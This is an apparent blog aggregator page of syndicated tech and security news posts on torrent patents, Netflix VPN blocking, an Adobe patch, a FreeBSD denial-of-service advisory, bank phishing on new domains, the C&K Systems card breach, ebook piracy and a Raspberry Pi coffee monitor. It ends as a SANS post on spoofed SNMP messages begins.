Posts tagged ‘Other’

TorrentFreak: AT&T Patents Technology to Keep Torrent Files Alive

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

attIn recent years the intellectual property division of AT&T has patented quite a few unusual inventions. Today we can add another to the list after the telecoms company was granted a patent which aims to keep torrent files available for as long as possible.

In the patent (pdf), which was awarded yesterday, the ISP points out that BitTorrent is a very effective way of sharing files online. However, AT&T also signals some drawbacks, including the fact that some torrent swarms stop working because there are no complete copies of the file available.

“As more and more peers download a complete copy of the file, the performance of the torrent deteriorates to the point that it becomes difficult for the file to be located and downloaded. As a result, current BitTorrent systems are not desirable for downloading older files,” the patent reads.

Since there are often many swarms downloading the same content via different trackers, it could be that the file lives on elsewhere. Similarly, other peers might be willing to start seeding the dead torrent again. AT&T’s patent pairs these sources to increase the availability of files downloaded via BitTorrent.

AT&T’s torrent patent
patent-att

The patent proposes to add “collaboration information” which may be obtained from each peer when it joins a torrent swarm. If a torrent has no active seeds available, this information can point the downloader to “dormant peers” or external trackers that still have active seeders.

“If the file is not available at an active peer, the tracker node has two options; it may contact some of the listed dormant peers to see if they are willing to make the file available, and/or it may contact a remote tracker node listed for the file,” the patent reads.

“If the file is made available by a dormant peer and/or at a remote torrent, the local peer can then establish a peer-to-peer communication with the dormant peer or a peer on the remote torrent, and download the file therefrom. As a result, the local peer can locate and download files that are not available on its current torrent from both dormant peers and peers in other torrents.”

The idea to point people to other trackers is not new. Most torrents come with multiple trackers nowadays to ensure that a file remains available for as long as possible. AT&T’s proposed invention would automate this feature.

The idea to contact “dormant peers” is more novel. In short, that means that people who previously downloaded a file, but are no longer seeding it, can get a request to make it available again.

Whether the ISPs has any real life applications for their invention is yet unknown. The current patent was granted this week, but the first application dates back to 2005, a time when BitTorrent wasn’t quite as mainstream as it is today.

The patent certainly doesn’t mean that the ISP encourages sharing copyrighted files. Among other anti-piracy innovations, AT&T previously patented systems to track content being shared via BitTorrent and other P2P networks and report those offenders to the authorities.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Copyright Holders Want Netflix to Ban VPN Users

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

netflixWith the launch of legal streaming services such as Netflix, movie and TV fans have less reason to turn to pirate sites.

At the same time, however, these legal options invite people from other countries where the legal services are more limited. This is also the case in Australia where up to 200,000 people are estimated to use the U.S. version of Netflix.

Although Netflix has geographical restrictions in place, these are easy to bypass with a relatively cheap VPN subscription. To keep these foreigners out, entertainment industry companies are now lobbying for a global ban on VPN users.

Simon Bush, CEO of AHEDA, an industry group that represents Twentieth Century Fox, Warner Bros., Universal, Sony Pictures and other major players said that some members are actively lobbying for such a ban.

Bush didn’t name any of the companies involved, but he confirmed to Cnet that “discussions” to block Australian access to the US version of Netflix “are happening now”.

If implemented, this would mean that all VPN users worldwide will no longer be able to access Netflix. That includes the millions of Americans who are paying for a legitimate account. They can still access Netflix, but would not be allowed to do so securely via a VPN.

According to Bush the discussions to keep VPN users out are not tied to Netflix’s arrival in Australia. The distributors and other rightsholders argue that they are already being deprived of licensing fees, because some Aussies ignore local services such as Quickflix.

“I know the discussions are being had…by the distributors in the United States with Netflix about Australians using VPNs to access content that they’re not licensed to access in Australia,” Bush said.

“They’re requesting for it to be blocked now, not just when it comes to Australia,” he adds.

While blocking VPNs would solve the problem for distributors, it creates a new one for VPN users in the United States.

The same happened with Hulu a few months ago, when Hulu started to block visitors who access the site through a VPN service. This blockade also applies to hundreds of thousands of U.S. citizens.

Hulu’s blocklist was implemented a few months ago and currently covers the IP-ranges of all major VPN services. People who try to access the site through one of these IPs are not allowed to view any content on the site, and receive the following notice instead:

“Based on your IP-address, we noticed that you are trying to access Hulu through an anonymous proxy tool. Hulu is not currently available outside the U.S. If you’re in the U.S. you’ll need to disable your anonymizer to access videos on Hulu.”

It seems that VPNs are increasingly attracting the attention of copyright holders. Just a week ago BBC Worldwide argued that ISPs should monitor VPN users for excessive bandwidth use, assuming they would then be pirates.

Considering the above we can expect the calls for VPN bans to increase in the near future.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Critical Update for Adobe Reader & Acrobat

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe has released a security update for its Acrobat and PDF Reader products that fixes at least eight critical vulnerabilities in Mac and Windows versions of the software. If you use either of these programs, please take a minute to update now.

adobeshatteredUsers can manually check for updates by choosing Help > Check for Updates. Adobe Reader users on Windows also can get the latest version here; Mac users, here.

Adobe said it is not aware of exploits or active attacks in the wild against any of the flaws addressed in this update. More information about the patch is available at this link.

For those seeking a lightweight, free alternative to Adobe Reader, check out Sumatra PDF. Foxit Reader is another popular alternative, although it seems to have become less lightweight in recent years.

SANS Internet Storm Center, InfoCON: green: FreeBSD Denial of Service advisory (CVE-2004-0230), (Tue, Sep 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A vulnerability has been discovered by Johnathan Looney at the Juniper SIRT in FreeBSD (base for Junos and many other products) in the way that FreeBSD processes certain TCP packets (https://www.freebsd.org/security/advisories/FreeBSD-SA-14:19.tcp.asc)  If you send TCP SYN packets for an existing connection (i.e. the correct source IP, source port, destination IP, destination port combination) the operating system will tear down the connection.  

The attack is similar to the “slipping in the TCP window” attack described back in 2004 by Paul Watson (http://packetstormsecurity.com/files/author/3245/), but using SYN packets instead of RST.  One of the Handlers has successfully reproduced the attack in their lab.  

For those of you that don’t have FreeBSD in your environment, you probably do. There are a number of products that utilise FreeBSD as their base operating system. A few that spring to mind are OSX, Bluecoats, CheckPoint, Netscaler and more (A partial list is here http://en.wikipedia.org/wiki/List_of_products_based_on_FreeBSD).  

Keep an eye out for updates from your vendors, Juniper’s is here  –>  http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10638″>=SIRT_1″>M

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Matthew Garrett: ACPI, kernels and contracts with firmware

This post was syndicated from: Matthew Garrett and was written by: Matthew Garrett. Original post: at Matthew Garrett

ACPI is a complicated specification – the latest version is 980 pages long. But that’s because it’s trying to define something complicated: an entire interface for abstracting away hardware details and making it easier for an unmodified OS to boot diverse platforms.

Inevitably, though, it can’t define the full behaviour of an ACPI system. It doesn’t explicitly state what should happen if you violate the spec, for instance. Obviously, in a just and fair world, no systems would violate the spec. But in the grim meathook future that we actually inhabit, systems do. We lack the technology to go back in time and retroactively prevent this, and so we’re forced to deal with making these systems work.

This ends up being a pain in the neck in the x86 world, but it could be much worse. Way back in 2008 I wrote something about why the Linux kernel reports itself to firmware as “Windows” but refuses to identify itself as Linux. The short version is that “Linux” doesn’t actually identify the behaviour of the kernel in a meaningful way. “Linux” doesn’t tell you whether the kernel can deal with buffers being passed when the spec says it should be a package. “Linux” doesn’t tell you whether the OS knows how to deal with an HPET. “Linux” doesn’t tell you whether the OS can reinitialise graphics hardware.

Back then I was writing from the perspective of the firmware changing its behaviour in response to the OS, but it turns out that it’s also relevant from the perspective of the OS changing its behaviour in response to the firmware. Windows 8 handles backlights differently to older versions. Firmware that’s intended to support Windows 8 may expect this behaviour. If the OS tells the firmware that it’s compatible with Windows 8, the OS has to behave compatibly with Windows 8.

In essence, if the firmware asks for Windows 8 support and the OS says yes, the OS is forming a contract with the firmware that it will behave in a specific way. If Windows 8 allows certain spec violations, the OS must permit those violations. If Windows 8 makes certain ACPI calls in a certain order, the OS must make those calls in the same order. Any firmware bug that is triggered by the OS not behaving identically to Windows 8 must be dealt with by modifying the OS to behave like Windows 8.

This sounds horrifying, but it’s actually important. The existence of well-defined[1] OS behaviours means that the industry has something to target. Vendors test their hardware against Windows, and because Windows has consistent behaviour within a version[2] the vendors know that their machines won’t suddenly stop working after an update. Linux benefits from this because we know that we can make hardware work as long as we’re compatible with the Windows behaviour.

That’s fine for x86. But remember when I said it could be worse? What if there were a platform that Microsoft weren’t targeting? A platform where Linux was the dominant OS? A platform where vendors all test their hardware against Linux and expect it to have a consistent ACPI implementation?

Our even grimmer meathook future welcomes ARM to the ACPI world.

Software development is hard, and firmware development is software development with worse compilers. Firmware is inevitably going to rely on undefined behaviour. It’s going to make assumptions about ordering. It’s going to mishandle some cases. And it’s the operating system’s job to handle that. On x86 we know that systems are tested against Windows, and so we simply implement that behaviour. On ARM, we don’t have that convenient reference. We are the reference. And that means that systems will end up accidentally depending on Linux-specific behaviour. Which means that if we ever change that behaviour, those systems will break.

So far we’ve resisted calls for Linux to provide a contract to the firmware in the way that Windows does, simply because there’s been no need to – we can just implement the same contract as Windows. How are we going to manage this on ARM? The worst case scenario is that a system is tested against, say, Linux 3.19 and works fine. We make a change in 3.21 that breaks this system, but nobody notices at the time. Another system is tested against 3.21 and works fine. A few months later somebody finally notices that 3.21 broke their system and the change gets reverted, but oh no! Reverting it breaks the other system. What do we do now? The systems aren’t telling us which behaviour they expect, so we’re left with the prospect of adding machine-specific quirks. This isn’t scalable.

Supporting ACPI on ARM means developing a sense of discipline around ACPI development that we simply haven’t had so far. If we want to avoid breaking systems we have two options:

1) Commit to never modifying the ACPI behaviour of Linux.
2) Exposing an interface that indicates which well-defined ACPI behaviour a specific kernel implements, and bumping that whenever an incompatible change is made. Backward compatibility paths will be required if firmware only supports an older interface.

(1) is unlikely to be practical, but (2) isn’t a great deal easier. Somebody is going to need to take responsibility for tracking ACPI behaviour and incrementing the exported interface whenever it changes, and we need to know who that’s going to be before any of these systems start shipping. The alternative is a sea of ARM devices that only run specific kernel versions, which is exactly the scenario that ACPI was supposed to be fixing.

[1] Defined by implementation, not defined by specification
[2] Windows may change behaviour between versions, but always adds a new _OSI string when it does so. It can then modify its behaviour depending on whether the firmware knows about later versions of Windows.

comment count unavailable comments

SANS Internet Storm Center, InfoCON: green: https://yourfakebank.support — TLD confusion starts!, (Tue, Sep 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Pretty much ever since the new top level domain (TLD) “.biz” went online a couple years ago, and the only ones buying domains in this space were the scammers, we kinda knew what would happen when ICANN’s latest folly and money-grab went live. It looks like a number of the “new” top level domains, like “.support”, “.club”, etc have now come online. And again, it seems like only the crooks are buying.

We are currently investigating a wave of phishing emails that try to lure the user to a copy of the Bank of America website. The main difference, of course, is that any login credentials entered do not end up with Bank of America, but rather with some crooks, who then help themselves to the savings.

Phishing emails per se are nothing new. But it appears that URLs like the one shown in the phishing email above have a higher success rate with users. I suspect this is due to the fact that the shown URL “looks different”, but actually matches the linked URL, so the old common “wisdom” of hovering the mouse pointer over the link to look for links pointing to odd places .. won’t help here.

But wait, there’s more! Since the crooks in this case own the domain, and obviously trivially can pass the so-called “domain control validation” employed by some CA’s, they actually managed to obtain a real, valid SSL certificate!

Quoting from the Certificate Authority’s web site:

Comodo Free SSL is a fully functional Digital Certificate, recognized and trusted by 99.9% of browsers. Your visitors will see the golden padlock and won’t see security warnings. What will you get:

  • Ninety day free SSL Certificate (other CAs offer 30 days maximum.)
  • Issued online in minutes with no paperwork or delays
  • Highest strength 2048 bit signatures / 256 bit encryption
  • Signed from the same trusted root as our paid certificates
  • Recognized by all major browsers and devices

They don’t mention why they think any of this is a good idea.

Addition of SSL to the phish means that another “scam indicator” that we once taught our users is also no longer valid. When a user clicks on the link in the phishing email, the browser will actually show the “padlock” icon of a “secure site”. See the screenshot below.

 

If you have seen other recent banking phishes that use new top level domains and/or valid SSL certificates, please let us know via the contact form, or the comments below!

 

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: Breach at Goodwill Vendor Lasted 18 Months

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

C&K Systems Inc., a third-party payment vendor blamed for a credit and debit card breach at more than 330 Goodwill locations nationwide, disclosed this week that the intrusion lasted more than 18 months and has impacted at least two other organizations.

cksystemsOn July 21, 2014, this site broke the news that multiple banks were reporting indications that Goodwill Industries had suffered an apparent breach that led to the theft of customer credit and debit card data. Goodwill later confirmed that the breach impacted a portion of its stores, but blamed the incident on an unnamed “third-party vendor.”

Last week, KrebsOnSecurity obtained some internal talking points apparently sent by Goodwill to prepare its member organizations respond to any calls from the news media about the incident. Those talking points identified the breached third-party vendor as C&K Systems, a retail point-of-sale operator based in Murrells Inlet, S.C.

In response to inquiries from this reporter, C&K released a statement acknowledging that it was informed on July 30 by “an independent security analyst” that its “hosted managed services environment may have experienced unauthorized access.” The company says it then hired an independent cyber investigative team and alerted law enforcement about the incident.

C&K says the investigation determined malicious hackers had access to its systems “intermittently” between Feb. 10, 2013 and Aug. 14, 2014, and that the intrusion led to the the installation of “highly specialized point of sale (POS) infostealer.rawpos malware variant that was undetectable by our security software systems until Sept. 5, 2014,” [link added].

Their statement continues:

“This unauthorized access currently is known to have affected only three (3) customers of C&K, including Goodwill Industries International. While many payment cards may have been compromised, the number of these cards of which we are informed have been used fraudulently is currently less than 25.”

C&K System’s full statement is posted here.

ANALYSIS

CK Systems has declined to answer direct questions about this breach. As such, it remains unclear exactly how their systems were compromised, information that could no doubt be helpful to other organizations in preventing future breaches. It’s also not clear whether the other two organizations impacted by this breach have or will disclose.

Here are a few thoughts about why we may not have heard about those other two breaches, and why the source of card breaches can very often go unreported.

Point-of-sale malware, like the malware that hit C&K as well as Target, Home Depot, Neiman Marcus and other retailers this past year, is designed to steal the data encoded onto the magnetic stripe on the backs of debit and credit cards. This data can be used to create counterfeit cards, which are then typically used to purchase physical goods at big-box retailers.

The magnetic stripe on a credit or debit card contains several areas, or “tracks,” where cardholder information is stored: “Track 1″ includes the cardholder’s name, account number and other data. “Track 2,” contains the cardholder’s account, encrypted PIN and other information, but it does not include the account holder’s name.

An example of Track 1 and Track 2 data, together. Source:  Appsecconsulting.com

An example of Track 1 and Track 2 data, together. Source: Appsecconsulting.com

Most U.S. states have data breach laws requiring businesses that experience a breach involving the personal and financial information of their citizens to notify those individuals in a timely fashion. However, few of those notification requirements are triggered unless the data that is lost or stolen includes the consumer’s name (see my reporting on the 2012 breach at Global Payments, e.g.).

This is important because a great many of the underground stores that sell stolen credit and debit data only sell Track 2 data. Translation: If the thieves are only stealing Track 2 data, a breached business may not have an obligation under existing state data breach disclosure laws to notify consumers about a security incident that resulted in the theft of their card data.

ENCRYPTION, ENCRYPTION, ENCRYPTION

Breaches like the one at C&K Systems involving stolen mag stripe data will continue for several years to come, even beyond the much-ballyhooed October 2015 liability shift deadline from Visa and MasterCard.

Much of the retail community is working to meet an October 2015 deadline put in place by MasterCard and Visa to move to chip-and-PIN enabled card terminals at their checkout lanes (in most cases, however, this transition will involve the less-secure chip-and-signature approach). Somewhat embarrassingly, the United States is the last of the G20 nations to adopt this technology, which embeds a small computer chip in each card that makes it much more expensive and difficult (but not impossible) for fraudsters to clone stolen cards.

That October 2015 deadline comes with a shift in liability for merchants who haven’t yet adopted chip-and-PIN (i.e., those merchants not in compliance could find themselves responsible for all of the fraudulent charges on purchases involving chip-enabled cards that were instead merely swiped through a regular mag-stripe card reader at checkout time).

Business Week recently ran a story pointing out that Home Depot’s in-store payment system “wasn’t set up to encrypt customers’ credit- and debit-card data, a gap in its defenses that gave potential hackers a wider window to exploit.” The story observed that although Home Depot “this year purchased a tool that would encrypt customer-payment data at the cash register, two of the former managers say current Home Depot staffers have told them that the installation isn’t complete.”

The crazy aspect of all these breaches over the past year is that we’re only hearing about those intrusions that have been detected. In an era when third-party processors such as C&K Systems can go 18 months without detecting a break-in, it’s reasonable to assume that the problem is much worse than it seems.

Avivah Litan, a fraud analyst with Gartner Inc., said that at least with stolen credit card data there are mechanisms for banks to report a suspected breached merchant to the card associations. At that point, Visa and MasterCard will aggregate the reports to the suspected breached merchant’s bank, and request that the bank demand that the merchant hire a security firm to investigate. But in the case of breaches involving more personal data — such as Social Security numbers and medical information — very often there are few such triggers, and little recourse for affected consumers.

“It’s usually only the credit and debit card stuff that gets exposed,” Litan said. “Nobody cares if the more sensitive personal data is stolen because nobody is damaged by that except you as the consumer, and anyway you probably won’t have any idea how that data was stolen in the first place.”

Maybe it’s best that most breaches go undisclosed: It’s not clear how much consumers could stand if they knew about them all. In an opinion piece published today, New York Times writer Joe Nocera observed that “seven years have passed between the huge T.J. Maxx breach and the huge Home Depot breach — and nothing has changed.” Nocera asks: “Have we become resigned to the idea that, as a condition of modern life, our personal financial data will be hacked on a regular basis? It is sure starting to seem that way.” Breach fatigue, indeed.

The other observation I’d make about these card breaches is that the entire credit card system in the United States seems currently set up so that one party to a transaction can reliably transfer the blame for an incident to another. The main reason the United States has not yet moved to a more secure standard for handling cards, for example, has a lot to do with the finger pointing and blame game that’s been going on for years between the banks and the retail industry. The banks have said, “If the retailers only started installing chip-and-PIN card readers, we’d start issuing those types of cards.” The retailers respond: “Why should we spend the money upgrading all our payment terminals to handle chip-and-PIN when hardly any banks are issuing those types of cards?” And so it has gone for years.

For its part, C&K systems says it was relying on hardware and software that met current security industry standards but that was nevertheless deficient. Happily, the company reports that it is in the process of implementing point-to-point encryption to block any future attacks on its payment infrastructure.

“What we have learned during this process is that we rely and put our trust in many systems and individuals to help prevent these kinds of things from happening. However, there is no 100% failsafe security solution for hosting Point of Sale environments,” C&K Systems said. Their statement continues:

“The software we host for our customers is from a leading POS company and meets current PCI-DSS requirements of encrypted data in transit and data at rest. Point of sale terminals are vulnerable to memory scrapping malware, which catches cards in memory before encryption can occur. Our software vendor is in the process of rolling out a full P2PE solution with tokenization that we anticipate receiving in October 2014. Our experience with the state of today’s threats will help all current and future customers develop tighter security measures to help reduce threat exposure and to make them more cognizant of the APTs that exist today and the impact of the potential threat to their businesses.”

Too many organizations only get religion about security after they’ve had a serious security breach, and unfortunately that inaction usually ends up costing the consumer more in the long run. But that doesn’t mean you have to be further victimized in the process: Be smart about your financial habits.

Using a credit card over a debit card, for example, involves fewer hassles and risks when your card information inevitably gets breached by some merchant. Pay close attention to your monthly statements and report any unauthorized charges immediately. And spend more time and energy protecting yourself from identity theft. Finally, take proactive steps to keep your inbox and your computer from being ravaged by cybercrooks.

TorrentFreak: Search Engines Can Diminish Online Piracy, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

google-bayIn recent years Hollywood and the music industry have taken a rather aggressive approach against Google. The entertainment industry companies believe that the search engine isn’t doing enough to limit piracy, and have demanded more stringent measures.

One of the suggestions often made is to remove or demote pirate sites in search results. A lower ranking would lead fewer people to pirate sources and promoting legal sources will have a similar effect.

Google previously said it would lower the ranking of sites based on DMCA complaints, but thus far these changes have had a limited effect. A few weeks ago the company also began promoting legal options but this effort is in the testing phase for now.

The question that remains is whether these changes would indeed decrease piracy. According to new research from Carnegie Mellon University, they can.

In a paper titled “Do Search Engines Influence Media Piracy?” the researchers ran two experiments where they let participants use a custom search engine to find a movie they wanted to watch. The respondents could pick from a list of 50 titles and received a $20 prepaid virtual Visa card as compensation.

All search results were pulled from a popular search engine. In the control category the results were not manipulated, but in the “legal” and “infringing” conditions the first page only listed “legal” (e.g Amazon) and neutral (e.g IMDb) sites or “infringing” (e.g. Pirate Bay) and neutral sites respectively.

While it’s quite a simple manipulation, and even though users could still find legal and pirated content in all conditions, the results are rather strong.

Of all participants who saw the standard results, 80% chose to buy the movie via a legal option. This went up to 94% if the results were mostly legal, and dropped to 57% for the group who saw mostly infringing results on the first page.

To Pirate or Not to Pirate
resulttable

TorrentFreak contacted Professor Rahul Telang who says that the findings suggest that Google and other search engines have a direct effect on people’s behavior, including the decision to pirate a movie.

“Prominence of legal versus infringing links in the search results seem to play a vital role in users decision to consume legal versus pirated content. In particular, demoting infringing links leads to lower rate of consumption of pirated movie content in our sample,” he notes.

In a second study the researchers carried out a slightly modified version of the experiment with college students, a group that tends to pirate more frequently. The second experiment also added two new conditions where only the first three results were altered, to see if “mild” manipulations would also have an effect.

The findings show that college students indeed pirate more as only 62% went for the legal option in the control condition. This percentage went up gradually to 76% with a “mild legal” manipulation, and to 92% in the legal condition. For the infringing manipulations the percentages dropped to 48% and 39% respectively.

To Pirate or Not to Pirate, take two
table2

According to Professor Telang their findings suggest that even small changes can have a significant impact and that altering search algorithms can be instrumental in the fight against online piracy.

“The results suggest that the search engines may play an important role in fight against intellectual property theft,” Telang says.

It has to be noted that Professor Telang and his colleagues received a generous donation from the MPAA for their research program. However, the researchers suggest that their work is carried out independently.

As a word of caution the researchers point out that meddling with search results in the real world may be much more challenging. False positives could lead to significant social costs and should be avoided, for example.

This and other caveats aside, the MPAA and RIAA will welcome the study as a new piece of research they can wave at Google and lawmakers. Whether that will help them to get what they want has yet to be seen though.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Linux How-Tos and Linux Tutorials: Manage Multiple Logical Volume Management Disks using Striping I/O

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Tecmint. Original post: at Linux How-Tos and Linux Tutorials

In this article, we are going to see how the logical volumes writes the data to disk by striping I/O. Logical Volume management has one of the cool feature which can write data over multiple disk by striping the I/O. What is LVM Striping? LVM Striping is one of the feature which will writes the…

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

 
Read more at TecMint

TorrentFreak: How Publisher Harper Collins Tackles eBook Piracy

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

harperOne of the key elements leading to ease of piracy is file-size. Since music files are relatively small, unauthorized content can be distributed and accessed using a wide array of methods, from torrents and direct storage sites through instant messaging and humble email.

If music files are small, ebooks definitely share the same kind of characteristics. As a result, ebooks are widely pirated and made available on thousands of sites and services in a wide range of convenient formats. By attacking the problem from a number of different directions, this is something publisher HarperCollins is trying to do something about.

As part of its latest drive, this week the company announced a collaboration with LibreDigital, a leading provider of distribution and fulfillment services for ebook retailers. Together they adopted a new watermarking solution from anti-piracy company Digimarc.

Called Guardian Watermarking for Publishing, the system embeds all but invisible markers into ebooks. Then, Digimarc trawls the web looking for leaked content containing the watermarks. Once found, the anti-piracy company reports the unique identifiers back to Harpercollins who can match them against their own transaction records. This enables the company to identify the source of that material from wherever it occurred in the company’s supply chain.

Speaking with TorrentFreak, HarperCollins said that tracking these pre-consumer leaks provides intelligence to prevent them happening again.

“We have had leaks in the past in the final stages of our supply chain – via isolated instances of early releases by retailers. We therefore intend to be able to track these potential leaks in the future – especially now that our digital supply chain extends to many partners in many markets,” a spokesperson said.

“[The system] empowers us to go back to the source of the problem (ie identify the source) and find solutions to prevent this from happening in the future.”

Of course, pirates are known to attack watermarks by utilizing various methods including transcoding of files. Speaking with TF, Digimarc say their system is up to the challenge.

“The embedded identifiers are designed to survive conversion and manipulation,” a spokesperson said.

Interestingly, HarperCollins are going out of their way to ensure consumers that these watermarks won’t affect their privacy.

“This solution does not facilitate tracing back to the individual purchaser, only to the sales channel through which it was purchased,” a spokesperson explained. “And Digimarc itself stores absolutely no personally identifiable information or purchase information in the implementation of the watermark.”

That’s not to say that consumer leaks aren’t part of the problem though, they are, but HarperCollins says it employs separate strategies for pre and post-consumer piracy.

“Both [types of piracy] merit being addressed and we have different solutions for each. For the supply chain we will watermark; for the end consumer the retailers are applying DRM and we are employing Digimarc to issue takedowns and ensure site compliance – to protect our authors’ content,” the company said.

Like many content companies, HarperCollins regularly sends takedown notices to many websites but those it sends to Google are the most visible. To date the company has sent more than 250,000 to the world’s leading search engine, but what effect has that had on availability?

“The aim of our participation in Google’s copyright removal program is to reduce the visibility and availability of infringing content. The desired effect is clearing illegal download links from its SERP. We believe this to be an effective way to discourage piracy,” the company told TF.

We asked HarperCollins how it would rate Google in terms of anti-piracy cooperation, but the publisher declined to comment. The company also wouldn’t be drawn on how many notices it sends to other search engines and ‘pirate’ sites.

“We do not comment on the amount of notices – but we do want to assure authors that their entire catalog is covered by our work with Digimarc,” they said.

As eBooks continue to gain traction, publishers like HarperCollins will be keen not fall into the same traps as the music industry. It could be argued that actioned properly, takedowns are the most consumer friendly option. And watermarking shouldn’t become too unpopular, as long as it doesn’t extend to identifying the public. DRM, however, is rarely appreciated by the paying public.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Raspberry Pi: Fresh Coffee at Mailchimp

This post was syndicated from: Raspberry Pi and was written by: Ben Nuttall. Original post: at Raspberry Pi

Ben: Here’s a guest post from Steven Sloan, a developer at MailChimp.

IMG_4456

Grounds for innovation

Here at MailChimp, we’re always trying to listen hard and change fast. Turns out, this requires a good bit of coffee. Each department has its own take on how to keep the stuff flowing, mostly with the standard Bunn-O-Matic commercial machines. A few folks regularly avail themselves of our espresso setup. The developers fill two airpots—one with regular, the other double strength.

And then there’s the marketing team and our precious Chemex.

We make a pour-over pot once every hour or so, all day long, 5 days a week, 50-something weeks a year. Last December, when we were gathering data for our annual report, we got curious about how many Fresh Pots that might amount to. We tried to count it up, but begrudgingly had to accept the fact we didn’t have a good measure beyond pounds consumed. We even tried to keep track with a bean counter, but that didn’t last long.

For a while, the exact nature of our coffee consumption seemed like it would remain just another mystery of the universe. But then one day, talking to Mark while waiting on yet another Fresh Pot, I said, “Hey, I bet we could track the temperature with a Raspberry Pi and post to the group chat when there’s a fresh one.”

I wasn’t too serious, but Mark’s response was one often heard around MailChimp when ridiculous projects are proposed: “Sounds great, just let me know what you need to get it done.”

A few days later, I had a materials list drawn up from Adafruit’s thermometer tutorial, and we were off to the races.

IMG_4442

A fresh Pi

With a Raspberry Pi in hand, the first thing I did was add a script to the boot process that sent an email using Mandrill with its IP so I could find it on our network without trouble.

Then, I had to tackle the problem of detecting pot states with only a single datapoint: current temperature. I hoped that comparing the running averages of different time spans would be enough to determine the pot’s status. (The average Chemex temperature over the course of a few minutes, for instance, would tell us something different than the average temperate over the course of an hour.)

Since this was a greenfield project, I wanted to work with an unfamiliar language. I felt like the more functional nature of Clojure would be a great fit for passing along a single piece of state. This turned out to be a great decision, and I’ll explain why in a minute.

Graph it home

I hacked together a quick program that would spit out the current temperature, minute’s running average, hour’s running average, and the running average’s rate of change to a log file so I could analyze them.

...
{"current":32.062, "minute":24.8747, "hour":23.5391, "running-rate":0.039508}
{"current":32.437, "minute":25.0008, "hour":23.5635, "running-rate":0.0423943}
{"current":32.875, "minute":25.1322, "hour":23.5897, "running-rate":0.045361}
{"current":33.625, "minute":25.2738, "hour":23.6177, "running-rate":0.048569}
{"current":33.625, "minute":25.413, "hour":23.6476, "running-rate":0.05159}
{"current":33.625, "minute":25.55, "hour":23.6793, "running-rate":0.054437}
...

Log files in hand, I temporarily turned back to Ruby using the wonderful Gruff charting library to visualize things and make patterns easier to spot.

A few batches of hot water gave me a decent idea what things should look like, so I moved our coffee equipment to my desk to get some live data. This let me check in with the actual running state of the program and compare it with the status of the pot (and led to some coworker laughs and a wonderful smell at my workspace all day).

07-c

A brewing or fresh pot is easy to recognize, but figuring out when the pot is empty turned out to be a little tricky. It takes a while for the Chemex to completely cool off, which means it could be empty and still warm, which I’m sure would lead to more than a few disappointing trips to the kitchen. Luckily, the rate a pot cools tells us if it is empty or not—for instance, a half-full pot stays warm longer than an empty one simply because of the coffee still in it. Always nice to have physics on your side.

Watchers for the win

Armed with the collection of datapoints (running averages, rate of change, etc.) for each of the pot’s states, I moved on to figuring out how to notify our department’s group chat room when a pot was brewing, ready, empty, or stale. This is where some of the built-in features of Clojure came in handy.

I already had a program that logged the current state of itself every second. By switching the actual state to an agent, I could apply watchers to it. These watchers get called whenever the agent changes, which is perfect for analyzing changes in state.

Another agent added was the pot itself. The watcher for the temperature would look for the above mentioned boundaries, and update the pot’s state, leaving another watcher to track the pot and notify our chat room. When it came time to pick an alias to deliver the notifications, Dave Grohl was the natural choice.

Here’s a simple example of the pot watcher looking for a brewing pot:

(def pot-status
  (agent {:status "empty"}))

(defn pot-watcher [watcher status old_status new_status]
  (if (= (:status new_status) "brewing")
    (notify/is_brewing)))

(add-watch pot-status :pot-watcher pot-watcher)

The great thing is the watcher only gets called when the status changes, not on each tick of the temperature. Using agents felt great to me in this case as they provided a clean way to watch state (without callbacks or a ton of boilerplate) and maintain separation of concern between different parts of the program.

hipchat1

Freshness into the future

I’m still working out a few kinks, tuning in the bounds, and keeping a log of pots. It’s been a fun experience and I learned a ton. Something tells me this won’t be the last time we work with Raspberry Pi on a project. What’s next, Fresh Pots in space? Luckily, we’ve got plenty of coffee to propel us.

tumblr_n9kwt5IBUt1ri8rtfo1_1280

Ben: Thanks to Steven and MailChimp for permission to use the post – we’re very pleased to see the Pi used as the tool of choice of coffee-hungry developers around the world! Coffee is important to us here at Pi Towers…

Trojan Room Coffee Pot

Blast from the past – remember this coffee pot? Click to read more

MailChimp is what I use to power Pi Weekly – my weekly Raspberry Pi news & projects email newsletter – check it out at piweekly.net!

LWN.net: Freenode server compromised

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

The freenode infrastructure team found a server
issue
that indicated that an IRC server may have been compromised.
We immediately started an investigation to map the extent of the
problem and located similar issues with several other machines and have
taken those offline. For now, since network traffic may have been sniffed,
we recommend that everyone change their NickServ password as a
precaution.
” (Thanks to Paul Wise)

SANS Internet Storm Center, InfoCON: green: Spoofed SNMP Messages: Mercy Killings of Vulnerable Networks or Troll?, (Mon, Sep 15th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

2nd Update

